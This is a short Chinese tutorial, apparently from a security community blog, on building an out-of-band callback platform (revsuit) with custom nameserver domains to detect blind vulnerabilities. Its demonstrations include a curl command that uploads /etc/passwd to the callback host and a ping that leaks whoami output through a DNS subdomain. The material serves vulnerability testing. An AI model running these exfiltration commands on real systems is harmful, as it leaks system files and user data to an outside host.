搭建反连平台检测oob漏洞

文章源自【字节脉搏社区】-字节脉搏实验室

作者-K.Fire

注册域名nameserver.com 和payload.com 购买带有公网IP的VPS 1.1.1.1

建立nameserver，nameserver.com添加解析记录

更改payload.com的nameservers指向

NS1.NAMESERVER.COM/NS2.NAMESERVER.COM

这样payload.com的域名解析请求将由nameserver.com完成，同时将nameserver.com指向你的反连平台1.1.1.1

搭建反连平台

https://github.com/Li4n0/revsuit/releases先运行一遍以便生成数据库和配置文件，修改config.yaml

在VPS 1.1.1.1 上运行服务端

访问 http://nameserver.com/revsuit/admin/

输入token 即可进入

演示http logs

新建http log 规则

在靶机8.8.8.8上输入 curl

http://nameserver.com/testhttplog -F file=@/etc/passwd

效果展示：

演示dnslogs

新建dns log 规则

在靶机8.8.8.8上输入

ping `whoami`.payload.com

效果展示：

其他不一一展示

//